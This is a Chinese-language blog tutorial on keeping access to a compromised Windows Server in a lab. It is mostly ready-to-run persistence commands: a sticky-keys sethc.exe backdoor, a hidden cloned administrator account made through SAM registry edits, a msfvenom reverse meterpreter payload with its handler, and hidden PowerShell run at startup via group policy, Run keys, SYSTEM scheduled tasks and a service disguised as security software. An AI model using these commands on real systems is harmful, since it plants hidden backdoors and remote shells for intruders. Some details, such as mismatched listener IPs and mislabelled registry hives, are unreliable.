Windows權限維持
目錄- Windows權限維持
- 1.服務器入侵流程
- 2.shfit后門維持
- 粘滯鍵概念:
- shfit后門原理:
- 操作方式:
- 3.克隆賬號維持
- 隱藏賬戶:
- 1、添加隱藏用戶
- 2、在注冊表操作進行用戶隱藏
- 4.啟動項維持
- 1、組策略
- 反彈shell木馬生成
- 2、啟動檔案夾
- 啟動檔案夾:
- 組策略腳本啟動檔案夾:
- 3、注冊表
- 1、組策略
- 5.計劃任務維持
- 6.系統服務維持
環境:
- Windows Server2008(靶機機)
- kali(攻擊機)
1.服務器入侵流程
資訊收集、漏洞掃描、滲透攻擊、提權、后滲透、持續控制
2.shfit后門維持
粘滯鍵概念:
粘滯鍵漏洞,在Windows系統下連續按5下SHIFT鍵,可以啟動系統的粘滯鍵功能,其行程名為Sethc.exe,應用程式在C:\Windows\system32下,
shfit后門原理:
通過將其他應用程式(如:cmd.exe、或者木馬、病毒)將Sethc.exe這個可執行程式進行替換,當再次連續按5次SHIFT鍵,就會以system權限運行替換后的應用程式,
操作方式:
復制cmd.exe為sethc.exe
copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe
如果權限不夠需要更改檔案權限,如下命令
takeown /f c:\windows\system32\*.* /a /r /d y
cacls c:\windows\system32\*.* /T /E /G administrators:F
3.克隆賬號維持
隱藏賬戶:
顧名思義就是計算機上看不到的用戶,在一個用戶后面添加$符號,如(hack$)達到簡單的隱藏用戶目的,從而進行簡單的權限維持,
1、添加隱藏用戶
net user hack$ admin@123 /add
這樣創建的隱藏用戶,只有使用net user時可以隱蔽,在登錄界面、計算機管理、控制面板、注冊表中都可以查到,
2、在注冊表操作進行用戶隱藏
打開注冊表regedit
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\
匯出之前創建的hack$用戶注冊表檔案
復制administrator中的F鍵值
將復制的值,粘貼到hack$對應的F值中
將hack$對應的資料匯出來
通過這樣的方法,隱藏用戶,只有到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\下才能看見hack$用戶,
遇到的問題:當我使用windows server2008去查注冊表時,只能查到HKEY_LOCAL_MACHINE\SAM\SAM,后面的檔案夾沒有看見,
解決方法:當點擊到SAM時無法看見后面的檔案,需要右鍵設定權限,把管理員權限設定為可讀可寫,然后重新打開注冊表,
4.啟動項維持
啟動項,作業系統在啟動的時候,自動加載了很多程式,會在前臺或者后臺運行,行程表中出現了很多的行程,也許有病毒或木馬在自啟動行列,
添加啟動項的方式:
1、組策略
可以通過利用組策略開機啟動腳本
在運行框中輸入“gpedit.msc”,打開組策略
在【Windows設定】->【腳本(啟動/關機)】雙擊【啟動】就可以進行設定
選擇要添加的腳本或者PowerShell
用msf生成一個powershell的木馬
反彈shell木馬生成
(1)機器名和IP地址
Windows Server 2008 192.168.142.134
kali 192.168.142.128
(2)運行
msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.142.128 lport=3333 -f psh -o 1.ps1
(3)在目標服務器進行下python -m http.server 8000
(4)創建一個1.bat腳本,并且添加到組策略【腳本】中
bat腳本內容如下:
@echo off
powershell.exe -w hidden -ExecutionPolicy Bypass -NoExit -File C:\phpstudy_pro\WWW\shell\shell.ps1
exit
(5)kali運行msf進行監聽
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.13.128
set LPORT 3333
run
(6)重啟server2008機器
2、啟動檔案夾
啟動檔案夾里面的檔案可以會在開機的時候自動啟動,
通過開始選單---所有程式---啟動 這個檔案夾內,可以將程式開機自啟動,
啟動檔案夾:
C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系統級,需要system權限
C: \Users\用戶名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用戶級
組策略腳本啟動檔案夾:
C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown
C:\Windows\System32\GroupPolicy\User\Scripts\Logon
C:\Windows\System32\GroupPolicy\User\Scripts\Logoff
3、注冊表
注冊表(Registry,繁體中文版Windows作業系統稱之為登錄檔)是Microsoft Windows中的一個重要的資料庫,用于存盤系統和應用程式的設定資訊,
(1)打開注冊表
HKEY_LOCAL_MACHINE類
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER類
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
(2)使用reg add 命令進行添加
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\phpstudy_pro\WWW\shell\1.bat"
5.計劃任務維持
計劃任務是系統的常見功能,利用任務計劃功能,可以將任何腳本、程式或檔案安排在某個最方便的時間運行,任務計劃可以在每次系統啟動的時候啟動并在后臺運行,
(1)打開計劃任務
1、【管理工具】--->【任務計劃程式】
2、【控制面板】--->系統和安全--【計劃任務】
3、【taskschd.msc】命令
(2)生成計劃任務
使用schtasks命令
/Create 創建新計劃任務,
/Delete 洗掉計劃任務,
使用以下命令進行測驗
1、在每個任意用戶登錄中以SYSTEM的形式執行計劃任務:
schtasks /create /tn 計劃任務名 /tr "計劃任務執行檔案命令" /sc onlogon /ru System
2、在系統啟動期間或用戶會話處于非活動狀態(空閑模式)時執行
schtasks /create /tn 計劃任務名 /tr "計劃任務執行檔案命令" /sc onidle /i 30
3、在系統啟動的時候以SYSTEM的形式執行計劃任務:
schtasks /create /tn 計劃任務名 /tr "計劃任務執行檔案命令" /sc onstart /ru System
4、計劃任務以 System 權限每10分鐘運行一次
schtasks /create /tn 計劃任務名 /tr "計劃任務執行檔案命令" /sc minute/mo 10 /ru system
利用當系統開機的時候運行計劃任務進行權限維持
schtasks /create /tn shell /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe --w hidden --ExecutionPolicy Bypass --NoExit --File C:\1.ps1" /sc onstart /ru System
6.系統服務維持
服務:
能夠創建在作業系統自己的 Windows 會話中可長時間運行的可執行應用程式,
這些服務可以在計算機啟動時自動啟動,可以暫停和重新啟動而且不顯示任何用戶界面,
創建服務:
sc命令
用法: sc create [service name] [binPath= ] ...
1、創建服務
sc create shell start= auto binPath= "C:\phpstudy_pro\WWW\1.exe" obj= Localsystem
2、查看服務是否已經創建
services.msc
3、修改正常的名稱和描述
sc description "shell" "安全"
4、啟動服務
net start "服務名"
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/548474.html
標籤:其他
上一篇:ChatGPT與碼農的機會
